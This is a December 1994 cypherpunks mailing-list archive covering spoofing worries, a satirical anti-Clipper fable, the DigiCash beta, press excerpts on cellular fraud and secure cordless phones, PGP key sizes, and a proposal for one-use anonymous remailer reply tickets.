Spoof a letter from someone and you can make the cypherpunks send that person some hate mail. Basically, I just think it's a mistake. I think that annotating a message as it passes through cypherpunks -- such as cypherpunks at hks.net does -- is a fine idea. However, I think that adding new ways for attackers to make privacy advocates look bad isn't a great idea. The proposed system is for everyone, not just pseudonyms. If I meant pseudonyms, I would have said pseudonyms, not nyms. I understood that and followed the same convention. I'm not worried about pseudonyms -- they land in the bit bucket somewhere. I'm more concerned about spoofed real addresses. Rick From lmccarth at freya.cs.umass.edu Sat Dec 3 18:13:52 1994 From: lmccarth at freya.cs.umass.edu (lmccarth at freya.cs.umass.edu) Date: Sat, 3 Dec 94 18:13:52 PST Subject: The Emperor's New Brain (fwd) Message-ID: <199412040218.VAA12370@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Sincere apologies if someone's sent this to the list before.... Forwarded message: > This comes to you courtesy of Del's friend Joe Levy: > > Would you all mind distributing this as much as possible? I, and every > net-surfer who is concerned about her/his rights, are trying to stop Big > Brother from taking over, and need all the help we can get. There may be more > serious letters later on. For now, just enjoy a slightly ridiculous one. All > the best, and don't get struck by flying pygmies, as always. > Forever, > Joe > > > The Emperor's New Brain > by Blimix (Joe Levy) > > (With apologies to Hans Christian Anderson.) > > Once upon a time, there was an Emperor. He had been voted > into office fairly easily, because he had managed to impress people > with his brain. But once he realized that the job demanded more, > he said, "My brain is too small!" So he had posters hung on every > blank wall in the kingdom, proclaiming the need for skilled neural > surgeons/tailors to weave him a new, better, bigger brain. 
"Soon," > he thought, "I will have a good brain and will be able to govern my > empire properly, and all the people will love me, and I'll be so > cool that there'll be chicks hanging around me all the time... > Maybe I'll even get a car, or put up the bestest BBS in the > world..." and so on. What he didn't know what that he was saying > all of this out loud, and that a small band of rogues had been > shadowing him for the duration of his monologue. When the Emperor > had left to pursue other activities, due to the rather self- > exciting nature of his mostly derailed train of thought, the rogues > spoke amongst themselves. > "Will you listen to that, mate?" commented NSA. "The poor > chap really hasn't got a clue!" > "Yeah, let's put him out of our misery," remarked FBI. > "Be quiet, will you?" said CIA. "You dolt, don't you see the > prospects here? We can rule this place. NSA and NIST have the > plan. Where is NIST, anyway?" > "He'll be along, shortly. He had some business with that > hotshot DES. Chopped half of DES's - thing - off, he did. Ugly > business," replied NSA. > > * * * > > "Sire, there are some important-looking men to see you," said > the page. > The Emperor jumped. "What?!? Oh! Okay, I'll be down > shortly. Um, you didn't... see anything... did you?" > "No, Sire," the page replied immediately. > The Emperor left to wash his hand. > > * * * > > "You mean you can weave a tremendous brain for me if I just > bring you all the doors, window blinds and roofs in the kingdom, > using your Clippers?" > "Yeah, but there's also the matter of payment," said CIA. > NSA spoke. "We understand that you have, in the castle > vaults, a supply of magical potions of growth. Those will do > nicely." > "But those are the only ones in the kingdom! We have saved > them since the days of my great-great-great-great-grandmother, > what's-her-name!" > FBI stood to his full, rather impressive height, and looked > down at the suddenly small-feeling Emperor. 
"This is what's best > for the kingdom, isn't it? You need a brain, and we need the > potions. Do you really want to argue?" > "Uh... of course not." was the meek response. > "Good. Now that that's settled-" began NSA. > "But what if the peasants want to keep their roofs and doors > and blinds?" interrupted the Emperor. > NSA confidently replied, "They won't. We'll make sure that > they know it's all for the common good. Besides, those things are > only needed to conceal things. People who have nothing to hide > have no cause to resent this, do they? Besides, if against all > likelihood, our idea is rejected by the public, we can simply put > everything that we took away back again. And don't think for a > moment that we would be looking into the houses of innocents. No, > we can help you take care of your subjects. They will look up to > us as kindly Big Brothers." > "I'm quite capable of taking care of the kingdom myself," > asserted the Emperor. > "Nonsense," CIA remarked. "We're the ones building you this > brain, right?" > "Right," the Emperor acquiesced, though he wasn't quite sure > that the conclusion followed logically from this. He felt there > was something slightly wrong, but since he could not tell what, he > decided not to risk making a fool of himself. > "Then we can begin!" roared FBI. > > * * * > > At the scoundrels' insistence, the Emperor ordered every > construction worker in the kingdom to work on the dismantling of > the houses, using their new Clippers. Thus did the infrastructure > suffer, as roads crumbled, and prices rose, while the economy began > a slow but accelerating collapse. Just inside the castle, a ragged > collection of peasants met with the Emperor. > "Why are your goons doing this to us?" cried one woman. "I > can't get to work anymore!" > And old man spoke up. "Without a roof, we can't keep the > rains off of us! My whole family has pneumonia!" Several others > shouted their agreement. 
> "I was willing to sacrifice for the kingdom," lamented a > former merchant. "I willingly gave them all of my wood, and put up > paper instead. They ripped it down! And they didn't even use it! > They just said I couldn't have anything covering me." > "I'm sure there are perfectly reasonable explanations for all > of this." > Suddenly four towering figures entered, and herded the > peasants outside. "There's no such thing as rain! Stop > complaining!" A few families were trampled during the confusion, > but no one noticed. > > * * * > > It was only a week later that the smoke was first seen. > Behind the castle, the tremendous stockpiles of collected wood were > being burned. > "My kingdom is collapsing!" cried the Emperor. > "And we know why!" exclaimed FBI. "There are secret societies > of witches that oppose us. But our spies, KGB and Mccarthy, have > been rooting them out. That is what the fires are for." > "But you're burning the wood that you said you would save!" > "SO WHAT?!?!?!?" > "Okay, as long as you put it that way. What about my brain?" > This caught FBI by surprise, for he had completely forgotten > about the deal. Luckily, CIA happened to be in the room, and > glibly replied, "The chemical reactions going on right now are the > final processes in the construction of the brain." > "Oh, goody." The prospect of the new brain cheered up the > Emperor, and he forgot about his dying kingdom. > > * * * > > Witch-burnings were becoming common. The rogues, now grown to > immense size, regularly reached into houses, plucking out the > occupants, and placed them on the huge bonfires. The first ones > taken, of course, were the poor peasants who had originally spoken > up. Then, anyone who had a brain was considered a potential > threat, and made into a scapegoat. > "What did this woman do that makes you believe she's a witch?" > the Emperor asked. > FBI replied, "She turned me into a n-" > "Shut up," said NSA. 
"We discovered a rumor about strange > activities going on in her house. We checked it out, and surely > enough, we found this." He triumphantly held up a rather well- > executed painting of a swan launching itself into flight from an > alpine lake. > "What is its relevance to witchcraft?" > NSA began, "First, the canvas can be used to shield her from > sight, so she obviously has something to hide. Also, the drawing > itself is obviously a dangerous example of freedom propaganda. As > we all know, freedom cannot be tolerated. We also intercepted this > letter from her to her band. It proves that she and the twenty > other people named here are witches." > Working her mouth free of the gag, the woman cried, "I didn't > write that! It's not even in my hand-" FBI cut off her protest by > flinging her into the blazing conflagration. > > * * * > > NSA congratulated his friends. "Well, lads, we've made a > killing. Besides having the power to do whatever we want to > whomever we want, our Clippers are selling like wildfire, since > they're the only product that anyone is allowed to buy now. Can > you believe we actually managed to convince people that those > things are useful?" They all laughed heartily at this. "It's > probably time to invite the Emperor back into the castle." > At their call, his Excellency dutifully entered. "We finished > your brain last night, and implanted it while you were sleeping in > the stables," claimed CIA. "It is indeed huge, and, being made > from pure energy (released by the burning wood), weighs virtually > nothing. We fashioned it in such a way that only a person without > personal problems can see it, so that you may judge this > characteristic in people with ease." > FBI held up a mirror to facilitate the Emperor's viewing of > his new brain. "How do you like it?" > Though he saw nothing but his own reflection, he said, "It is > a good brain. I like the laurels particularly. 
Let's hold a > parade, so that all may see The Emperor's New Brain!" > > * * * > > And so it was. The day came, and the broken people trudged > through the pitted streets to finally view the great result of > their even greater sacrifice. As they waited expectantly for the > parade train, they wondered, "Was the loss of our privacy and > freedom of thought worth a slightly more effective government?" > But they could do nothing more than wonder, for to speak thusly > would mean certain death. So, they mutely held their only > possessions, the Clippers, which had been the instruments of their > downfall. > A wave of excitement swept through the crowd, as the arrival > of the parade was heralded. All knew of the wondrous properties > that the Brain possessed, and were eager to see it for themselves. > As the crowd held its breath, the Emperor came into view. And no > one was surprised that they could not see the brain, because they > knew perfectly well that they had problems. But this could not be > admitted. Words of praise floated through the air. "How regal it > is!" "That brain is huge!" "I like the color scheme." "Now he'll > be able to solve all of our problems." > "That brain doesn't exist," said a junior programmer. > "Well, neither do we," said a philosopher. > "No, I mean it! There's no brain there!" the programmer > insisted. And gradually, the crowd became aware of the truth of > his words. > "The Emperor doesn't have a brain!" they all shouted. They > picked up fragments of concrete that had once been a sidewalk, and > started throwing them. Luckily for the Emperor, this behavior was > quelled when FBI stepped on the offending parties. > The survivors were too weak, due to lack of protection from > the elements, to fight back. And while the all-powerful villains > lived comfortably for the rest of their lives, a nation died. 
> > * * * * * * * * * * * * * * * * * * * * * > > "They that can give up essential liberty to obtain a little > temporary safety deserve neither liberty nor safety." - Benjamin > Franklin > > Don't let Clipper be YOUR downfall. Learn as much as you can, > than do whatever you can to educate others, and let your > representatives and senators know how you feel. Wired is a good > source of information. Read the April issue. Or gopher to > wired.com to see their database. Lazarus Long and I will be > putting up Clipper-dedicated databases of our own. (More > information to follow.) > > Y Gwir Yn Erbyn Byd, > Blimix > jl0637 at rachel.albany.edu > > p.s. Please feel free to distribute this story at will. I merely > ask that you do not change or delete any part of it, from the title > line to this post-script. > - -- > Adam Lindsey Jacobs | "Thinking is the hardest work > bullfrog at jaflrn.morse.net | there is, which is probably the > Long Island, New York, U.S.A. | reason why so few engage in it." - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuEm6SoZzwIn1bdtAQGeiwGAjvh39y5hWN9+zNUVHGz8W2KHkVIYsdvR MSzDCX+lV4LRH2gc0c5IXp9CypYJke8h =U7j5 -----END PGP SIGNATURE----- From alex at omaha.com Sat Dec 3 18:23:47 1994 From: alex at omaha.com (Alex Strasheim) Date: Sat, 3 Dec 94 18:23:47 PST Subject: Brands excluded from digicash beta In-Reply-To: <199412040154.TAA00186@omaha.omaha.com> Message-ID: <199412040223.UAA00225@omaha.omaha.com> -----BEGIN PGP SIGNED MESSAGE----- > Yes, it is granted that Digicash is in beta, and not polished. But > beta testing usually happens after all significant functionality is > present. The Digicash beta isn't moving real money, and that's a > significant functional deficit. 
Couldn't we make a similar argument against digital commerce systems in general? Most of the things I want to buy aren't available online, so what good are net based transactions?

In a sense that's true, but at the same time it seems clear that eventually one or more systems with goods and services I want to buy (at prices I want to pay) will emerge. If I didn't believe that, I wouldn't be very interested in the topic.

Unless Digicash has significant problems with banks or governments that I don't know about (always a possibility), the things I've heard about the beta test make me believe that a functional transaction system from that company will probably be released.

> Who can say? It hasn't been released for real. Clearing and
> settlement in a payments system are _most_ of the problem, not sugar
> coating. FV is leveraging Visa for settlement, but Digicash currently
> has nothing.

I can understand why you'd need Visa's permission if you're going to be using a system that uses that credit card to process transactions. But if DigiCash feels their system is secure, what would stop them from just selling digital currency on their own?

They could say that they'll sell e-dollars for $1, and buy them for $0.95. Assuming they keep the revenue from currency sales in something low risk and they commit to making a market, wouldn't that be enough to get things rolling?

Individuals or banks all over the world could set up operations which convert e-currency to and from $US, working inside of the buy/sell spread set up by Digicash. On top of that, they'd get the interest income on the funds that back all the digital dollars, which would be a large source of income in addition to what they would make from the software.

If there's someone I can go to who will give me cash for digital currency, I'll take digital currency as a payment for any goods and services I sell. If someone else will give me a check for the digicash, what does my banker have to say about it?
== Alex Strasheim | finger astrashe at nyx.cs.du.edu alex at omaha.com | for my PGP 2.6.1. public key -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLuEn4REpP7+baaPtAQGSbwP/ccN3dvugcEgFg9lG6DuFw2JzdltDd63C 5ZkMiDMkbWly3i0d+TI5OGTFPoafjDaBRieaoCzsrjsZAWQDVrscjwrvCa38GQDD aTZa3AF9pEixhVWN0pFiDcUx7ByO92fFexA6POHnZOvTSNws9wqQ4b1vnaofWQNE k4s0ji7x3NE= =+8TT -----END PGP SIGNATURE----- From jya at pipeline.com Sat Dec 3 18:47:25 1994 From: jya at pipeline.com (John Young) Date: Sat, 3 Dec 94 18:47:25 PST Subject: NYT on Insecure Phones Message-ID: <199412040246.VAA25360@pipe3.pipeline.com> -----BEGIN PGP SIGNED MESSAGE----- The New York Times last Thursday had two pieces on telephones that may be of interest. One deals with cellular fraud in NYC, given entirely here: "Cellular Fraud in New York Cellular telephone fraud in New York City has become so rampant that a cellular service in Washington will temporarily block its customers from using their wireless phones when they travel in New York. Cellular One of Washington-Baltimore, owned by SBC Communications Inc., has sent its customers letters notifying them that it would block the service beginning on Thursday because it had compiled a huge backlog of phone numbers used in New York that appeared to be fraudulent. Company officials said they would resume service once they finished investigating each case, which they said would take three weeks. Cellular telephone fraud occurs when people use false identification numbers on their wireless telephones and make calls. The Cellular Telecommunications Industry Association said fraud costs had soared to about $1 billion a year. Cellular thieves typically use radio scanners to capture the identification numbers of legitimate cellular phones, which transmit the numbers each time they are used. These numbers are then written onto a computer chip inside an inactive phone, effectively 'cloning' the original." 
------------------- End illegitimate fraud article Then, probably not coincidentally in this happy legitimate-fraud shopping season, there was a long consumer-oriented article the very same day, alors, about new cordless phones, including this info about security features against illegitimate fraud: "A new generation of digital cordless phones using a powerful 900 megahertz (MHz) frequency ... blocks thieves who scan the airwaves listening for credit card and Social Security numbers people innocently give over the phone. ... Cellular car phones and two-way radio car service conversations were constant unwanted companions with the standard cordless phones [but] with the 900 MHz phones, the interference was practically non-existent. ... The Cincinnati Microwave Escort 9020 Digital Spread Spectrum Cordless Telephone is one of the first models to feature spread-spectrum technology -- originally developed for the military and now being used for consumers -- that digitally scrambles voice communications before transmitting them. ... ... newer standard-frequency models are offering improved security. By using scrambling technology -- though not as sophisticated as digital spread spectrum -- they block out most eavesdroppers. Panasonic calls the feature Secure Guard; Motorola, Secure Clear, and Toshiba, Call Protect. It doesn't add much to the cost ($10 to $25) and is well worth the money, although the phone is not as secure as a digital one." [My first PGP sig, hooray] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLuECi4Sb9hQ07hCVAQHhEQQAjzA4HuMxdExsQiHz2T22MpD8Qe6OqjCG CILxx10lXlqYU9/4xtruZuKNd4dHqzKIqsFhLD1IdIHOwplCzigPW5LIs7HKJAJ8 NpfE/lJ3y/ASgk5P21ZPEFHFgzt0voIRIMlrURIgD07kh35XqfaKZ21Jq7yUCfnh g8eLZ8RkgG0= =qYtN -----END PGP SIGNATURE----- From werewolf at io.org Sat Dec 3 19:26:01 1994 From: werewolf at io.org (Mark Terka) Date: Sat, 3 Dec 94 19:26:01 PST Subject: Date for 2048 bit Keys?? 
Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I saw an interesting thread in alt.security.pgp about when PGP v 2.6.2 will handle key sizes of up to 2048 bits. Someone speculated that it will take effect in the middle of the month (ie after Dec. 15 you type pgp -kg and it will give you four choices, the last one of up to 2048 bits). I wasn't aware that this feature was programmed into this version of PGP. I always thought that there was simply going to be another upgrade that would allow the larger key sizes. Can anyone shed some light on this??? -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLuEzya+YbMzawbu5AQE/aQP8CU/02O4PoXEWBrHFIMNc80BJS9tp0PC2 ZrWXEJt20QEzE9d8BvO6LhlfcoC5/aYgtp73BsfHnl6favzqp64K+9R8LaHb+P5v 8NipeLi37bdtoZpNG6/0F/WrXABZir9Z22+HHsI3DWuxZtiKRlfl9QAdxl2sss0I N1tCc05dU3U= =LIkh -----END PGP SIGNATURE----- From VAMAGUS at delphi.com Sat Dec 3 20:14:15 1994 From: VAMAGUS at delphi.com (VAMAGUS at delphi.com) Date: Sat, 3 Dec 94 20:14:15 PST Subject: Date for 2048 bit Keys?? Message-ID: <01HK82Z3V1IQ99EBA0@delphi.com> -----BEGIN PGP SIGNED MESSAGE----- werewolf at io.org wrote: >I saw an interesting thread in alt.security.pgp about when PGP v 2.6.2 will >handle key sizes of up to 2048 bits. Someone speculated that it will take >effect in the middle of the month (ie after Dec. 15 you type pgp -kg and >it will give you four choices, the last one of up to 2048 bits). > >I wasn't aware that this feature was programmed into this version of PGP. I >always thought that there was simply going to be another upgrade that would >allow the larger key sizes. > >Can anyone shed some light on this??? You beat me to the post :( I tested this out earlier today. I changed the system clock and I got this: Type bits/keyID Date User ID pub 1024/BEB3ED71 1994/09/18 J.L.Francois pub 2047/D9E1F2E9 1995/01/01 Francois, J.L It works but take a lot more time, obviously, to generate the key. 
***************************Frenchie Sends********************************* * 1024/Key ID: BEB3ED71 J. Francois 2048/Key ID: D9E1F2E9 * * As soon as any man says of the affairs of the state * * "What does it matter to me?" the state may be given up for lost. * * J.J.Rousseau - The Social Contract * ********************Want to know more about PGP? Ask me!****************** -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLwYqJrbmxeO+s+1xAQFfuwP/SjLrZsCdyiNERSxUyoDYyjcwpXZHw9o5 LdDV//DHEhttFCbiND5pbza+1Uiw+SubmwHCuP3UCSER9WtFWDd4SV7GcD2YDDiL DFwVYynp4jLd9HvbA2eHgguZ5uNO7xBXWyBaDkMeFHDdB3oP7QuUDpJz4IDwm7xs 0KcgRYvaQdc= =8qoX -----END PGP SIGNATURE----- From wesf at unicycle.cs.tulane.edu Sat Dec 3 20:24:55 1994 From: wesf at unicycle.cs.tulane.edu (Wes Felter) Date: Sat, 3 Dec 94 20:24:55 PST Subject: Moto Secure Clear digital? Message-ID: <9412040430.AA29360@unicycle.cs.tulane.edu> I just got a second phone line, and decided that if I was going to get a 2-line phone it might as well be a good one, so I am considering a Motorola Secure Clear cordless 2-line phone with speakerphone. This will be quite an investment,so I was wondering whether the Secure Clear phones are digitally encrypted or merely scrambled using some analog method. Anybody know about this? How secure are these phones really? --Wes Wesley Felter wesf at unicycle.cs.tulane.edu I speak for no one. Trust no one. Cryptography is outlawed and only the outlaws care. When thinking is outlawed, maybe then somebody will care. When thinking is outlawed, only outlaws will be able to care. From cactus at hks.net Sat Dec 3 20:27:32 1994 From: cactus at hks.net (L. 
Todd Masco) Date: Sat, 3 Dec 94 20:27:32 PST Subject: NYT on Insecure Phones Message-ID: <199412040432.XAA13619@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <199412040246.VAA25360 at pipe3.pipeline.com>, John Young wrote: > Cellular One of Washington-Baltimore, owned by SBC > Communications Inc., has sent its customers letters > notifying them that it would block the service beginning on > Thursday because it had compiled a huge backlog of phone > numbers used in New York that appeared to be fraudulent. It's worse than that! They will allow customers to use their service in NYC, I'm told by a customer of their's visiting this weekend, if they pay for the call with a credit card (IE, VISA, MC, etc) that they must *give* *an* *operator* *over* *the* *cellphone*. So to avoid their own exposure to fraud, they're requiring their customers to give credit card info over the cellphone. Thanks, guys. No pro-34s 'round here, nope. - -- Todd Masco | "Roam home to a dome, Where Georgian and Gothic once stood cactus at hks.net | Now chemical bonds alone guard our blond(e)s, cactus at bb.com | And even the plumbing looks good." - B Fuller - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuFGUioZzwIn1bdtAQF98wGAiBKy9nk/SzN7Nb/8v/noLEZDJgRCZy71 pjyDqlAtjnnQ0KelgzqDPLr8LIXAo8Eq =+JzJ -----END PGP SIGNATURE----- From jdwilson at gold.chem.hawaii.edu Sat Dec 3 21:45:04 1994 From: jdwilson at gold.chem.hawaii.edu (NetSurfer) Date: Sat, 3 Dec 94 21:45:04 PST Subject: How do *I* use PGP? In-Reply-To: Message-ID: On Sat, 3 Dec 1994, Bob Snyder wrote: > > What kind of machine is it? How do you read mail? A PC mail reader? > > >My primary access to this account is through my IBM xt (dos 3.3) at work. 
> >This machine is occasionally used by others and is outside of my control.

Use PGP DOS and keep your key on a diskette. W/640K you should be ok.

-NetSurfer

#include
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
== = = |James D. Wilson |V.PGP 2.7: 512/E12FCD 1994/03/17 >
" " o " |P. O. Box 15432 | finger for full PGP key >
" " / \ " |Honolulu, HI 96830 |====================================>
\" "/ G \" |Serendipitous Solutions| Also NetSurfer at sersol.com >
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

From MIKEINGLE at delphi.com Sun Dec 4 02:15:04 1994
From: MIKEINGLE at delphi.com (Mike Ingle)
Date: Sun, 4 Dec 94 02:15:04 PST
Subject: Interoperability, one-use remailer tickets
Message-ID: <01HK8FKNB3LE90PJWN@delphi.com>

The remailers need a one-time reply mechanism. This would enable many other things, including "persistent" anonymous entities, without using broadcast techniques. The current remailers encourage hit-and-run anonymity, like the recent burst of anonymous nastiness, and discourage conversational anonymity and persistent anonymous entities.

Sending a one-way message is easy and fairly secure. Creating a reply ticket is not very secure. The ticket can be replayed through the net to trace the path taken, and since the text following the ticket is sent in clear, it is easy to trace. The ticket can also be decrypted by coercion or hacking of the remailer machines. In general, there is enough persistent information available to trace any reply ticket. This is a bad thing.

A one-shot reply ticket would be designed so that, after the ticket was used or a set time had passed, the ticket was no longer valid and the information needed to trace the path, partially stored in the remailers, was gone.

One way to do this: each remailer has a list of secret (symmetric) keys. Each secret may have an expiration date.
By some method (problem discussed later) the user and the remailer establish a shared secret, adding it to the list, while the remailer does not find out who the user is. The reply ticket contains a series of nested hops, each encrypted with that remailer's secret plus all the others after it.

When the ticket is used, the remailer decrypts one layer of the ticket to obtain the next hop. It then encrypts the message with that secret key. Now it forgets the secret key (poof!) and passes the message and remainder of the ticket on to the next remailer. The ticket is getting decrypted at each hop, and the message is getting encrypted. Thus there is nothing recognizable between hops, and the trail is burning up as the message propagates. At the terminal end, the recipient applies all of the secret keys in the proper order to decrypt the message. Of course, an additional end-to-end public-key encryption is also an option.

The catch: how do we establish a shared secret with the remailer, without identifying ourselves to it? If the first remailer (the one the replyer sends the ticket to) is corrupt, and it knows who established the secret contained in the ticket, it knows the end-to-end path of the message.

Solution 1: each remailer has a public key. To establish shared secrets with a series of remailers, you send a normally-chained and nested message, using each remailer's public key. Each remailer decrypts a layer, stores the secret contained for it, and passes the message on. The first few remailers may not get secrets; they are just there to anonymize the message.

Problem: secret-establishing message is replayed, setting trail back up, then reply ticket is replayed.

Solution: when a secret is used, it is one-way hashed, the hash stored, the secret forgotten. Secrets which have already been used will not be accepted the second time. When the used secrets list gets full, a new public/secret pair is generated and the old one is forgotten, preventing any more replays.
Problem: remailers are coerced or hacked to decrypt a captured secret-establishing message, before the secret key is expired. Trail of a reply ticket can then be followed.

Solution: no good one that I can think of.

Solution 2: establish a shared secret by a simple, direct Diffie-Hellman exchange with the remailer. You send a public-piece in a message, remailer sends you a public-piece, both sides compute the secret. If the remailer is corrupt, it now knows who you are. This is a level-1 secret. Use the level-1 secret as a reply ticket to establish a secret with another remailer. Message goes through a remailer, to the target you want to establish a secret with. Target replies using the level-1 secret. This is a level-2 secret; two remailers have to be corrupt to trace this secret to you. If you want, use the level-2 secret for another exchange to create a level-3 secret, and so on until your comfort zone is reached. An automatic program sits around stockpiling secrets for you.

Problem: high bandwidth.

Does anyone know of a better way to establish a shared secret in an untraceable way? Both of these methods have their problems.

Given a secure two-way messaging mechanism, persistent anonymous identities are established using a "pigeonhole service". This is a service, with a publicized address, that will accept public-key encrypted mail and store it in a "pigeonhole". The owner of the pigeonhole anonymously sends a request (with authentication) and a reply ticket. The pigeonhole service sends the owner his mail using the ticket.

Anonymous users would need a client that could set up trails, create tickets, request mail from the pigeonhole, etc. One nice feature of the system is that non-anonymous users could talk to anonymous users without having a client.
The anonymous message would be of the form:

--- BEGIN REPLY TICKET (LEAVE AT HEAD OF REPLY) ---
(Reply ticket ciphertext)
--- END REPLY TICKET ---
Message text

The non-anonymous user could reply with any mail reader, send the message back to the remailer that sent it to him, and the message would be transported securely back to the anonymous user that sent it.

For something complex like this, we need a language with a little more leverage than C provides. For this and other complex protocols, I've ported RSAREF 2.0 to Perl. The interface does not require you to recompile Perl. It uses a C daemon and pipes. It provides symmetric encryption, public-key encryption, digital signatures, hashing, DH exchange, and ASCII armor. The algorithms used are MD5, MD2, DES, DESX, triple-DES, RSA, and DH. It has a good (eval/die) exception handling mechanism, and a very thorough regression testing script.

For reliability in a large remailer network, end-to-end reliability is better than point-to-point reliability. Messages should be m-of-n secret shared before transmission, and reassembled at the terminal end. For clientless reception, the terminal node remailer could do the reassembly and splitting of replies.

Code for secret sharing is available, but most secret-sharing algorithms create shadows each the size of the message. This can be avoided: use an error correcting code to add enough information to the original so the message can be recreated with any m of n pieces. Break into pieces, encrypt each piece, and secret-share the key. Where can I get an error correction algorithm that can do this? You should be able to increase a file's size by 50% and then have any two of three pieces recreate it, for example.

I want to add other algorithms to the Perl encryption package. The secret sharing, for one. A one-function call to gzip for compression. A blind signature if I could get patent permission (not from Chaum; how's Brands?)
or perhaps just do it with a "research purposes only" disclaimer. Someone with Visual Basic experience could do a DOS/Windows VBX module to enable easy writing of PC clients for neat net-based servers written with the Perl encryption package.

As Tim, Eric and others have pointed out, the problem of widespread, usable crypto is essentially the whole problem of interoperability across a network. Covering Unix for servers and Windows for clients would be a large step in the right direction.

Mike

From eric at remailer.net Sun Dec 4 06:53:52 1994
From: eric at remailer.net (Eric Hughes)
Date: Sun, 4 Dec 94 06:53:52 PST
Subject: Brands excluded from digicash beta
In-Reply-To:
Message-ID: <199412041552.HAA18636@largo.remailer.net>

   From: jrochkin at cs.oberlin.edu (Jonathan Rochkind)

   The current digi-cash software, as I understand it, would work fine in a real-cash situation. You would just need to pay for your ecash.

"Just"? That's where _most_ of the problem is.

Eric

From eric at remailer.net Sun Dec 4 06:54:46 1994
From: eric at remailer.net (Eric Hughes)
Date: Sun, 4 Dec 94 06:54:46 PST
Subject: ecash trial issues explained
In-Reply-To: <199412040013.AA21097@xs1.xs4all.nl>
Message-ID: <199412041550.HAA18633@largo.remailer.net>

   From: Alex de Joode

   One of the limitations of the DDS is that mail only can be sent to addresses that are in the .nl domain, so you cannot forward your mail.

Really? Can't it be packaged up and automatically sent through an Amsterdam anonymous remailer back to oneself?

Eric

From eric at remailer.net Sun Dec 4 06:56:46 1994
From: eric at remailer.net (Eric Hughes)
Date: Sun, 4 Dec 94 06:56:46 PST
Subject: Brands excluded from digicash beta
In-Reply-To: <199412040223.UAA00225@omaha.omaha.com>
Message-ID: <199412041555.HAA18642@largo.remailer.net>

   From: Alex Strasheim

   Unless Digicash has significant problems with banks or governments that I don't know about (always a possibility),

I have a simple rule of publicity here.
If there were a bank who had already agreed to back ecash, would it not already have been announced? Since no announcement of the sort has been forthcoming, I conclude that the probability that such a backer exists right now is low.

Eric

From jya at pipeline.com Sun Dec 4 07:12:00 1994
From: jya at pipeline.com (John Young)
Date: Sun, 4 Dec 94 07:12:00 PST
Subject: NYT on Wireless Data Systems
Message-ID: <199412041511.KAA24188@pipe1.pipeline.com>

-----BEGIN PGP SIGNED MESSAGE-----

Laurie Flynn writes today on wireless data systems by Ardis, Ram Mobile Data and the new Cellular Digital Data Packet.

For email copy send blank message with subject: WIR_no

- -----Key ID 34EE1095

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

From paul at poboy.b17c.ingr.com Sun Dec 4 08:49:19 1994
From: paul at poboy.b17c.ingr.com (Paul Robichaux)
Date: Sun, 4 Dec 94 08:49:19 PST
Subject: www-buyinfo list
In-Reply-To: <199412032022.OAA01633@omaha.omaha.com>
Message-ID: <199412041649.AA06103@poboy.b17c.ingr.com>

-----BEGIN PGP SIGNED MESSAGE-----

www-buyinfo-request at allegra.att.com

- -Paul

- --
Paul Robichaux, KD4JZG       | Good software engineering doesn't reduce the
perobich at ingr.com          | amount of work you put into a product; it just
Not speaking for Intergraph. | redistributes it differently.
### http://www.intergraph.com ###

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

From paul at poboy.b17c.ingr.com Sun Dec 4 09:09:42 1994
From: paul at poboy.b17c.ingr.com (Paul Robichaux)
Date: Sun, 4 Dec 94 09:09:42 PST
Subject: ecash trial issues explained
In-Reply-To: <9412031245.AA25009=brands@zeus.cwi.nl>
Message-ID: <199412041647.AA06076@poboy.b17c.ingr.com>

-----BEGIN PGP SIGNED MESSAGE-----

Stefan Brands wrote:
> I have not contributed to this discussion in any way afterwards. In light of
> this, I most certainly felt unhappy with the subject of "Brands excluded from
> digicash beta" someone decided to choose; the wording "excluded" implies
> something (the deliberateness of the whole thing) which I certainly did not
> intend to imply (and do not believe).

I am at least partially responsible for this, and I apologize. It is not fair to imply either that Digicash intentionally excluded Brands or that Brands claimed that they had.

It looks like everyone's concerns and complaints have been addressed. Thanks to the folks from Digicash for their work.

- -Paul

- --
Paul Robichaux, KD4JZG       | Good software engineering doesn't reduce the
perobich at ingr.com          | amount of work you put into a product; it just
Not speaking for Intergraph. | redistributes it differently.
### http://www.intergraph.com ###

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

From hfinney at shell.portal.com Sun Dec 4 10:00:24 1994
From: hfinney at shell.portal.com (Hal)
Date: Sun, 4 Dec 94 10:00:24 PST
Subject: Interoperability, one-use remailer tickets
In-Reply-To: <01HK8FKNB3LE90PJWN@delphi.com>
Message-ID: <199412041800.KAA02674@jobe.shell.portal.com>

Mike Ingle writes:

[Part about remailers deleted]

>For something complex like this, we need a language with a little more
>leverage than C provides. For this and other complex protocols, I've ported
>RSAREF 2.0 to Perl. The interface does not require you to recompile Perl.
>It uses a C daemon and pipes. It provides symmetric encryption, public-key
>encryption, digital signatures, hashing, DH exchange, and ASCII armor.
>The algorithms used are MD5, MD2, DES, DESX, triple-DES, RSA, and DH.
>It has a good (eval/die) exception handling mechanism, and a very thorough
>regression testing script.
>[...]
>I want to add other algorithms to the Perl encryption package. The secret
>sharing, for one. A one-function call to gzip for compression. A blind
>signature if I could get patent permission (not from Chaum; how's Brands?)
>or perhaps just do it with a "research purposes only" disclaimer. Someone
>with Visual Basic experience could do a DOS/Windows VBX module to enable
>easy writing of PC clients for neat net-based servers written with the Perl
>encryption package.

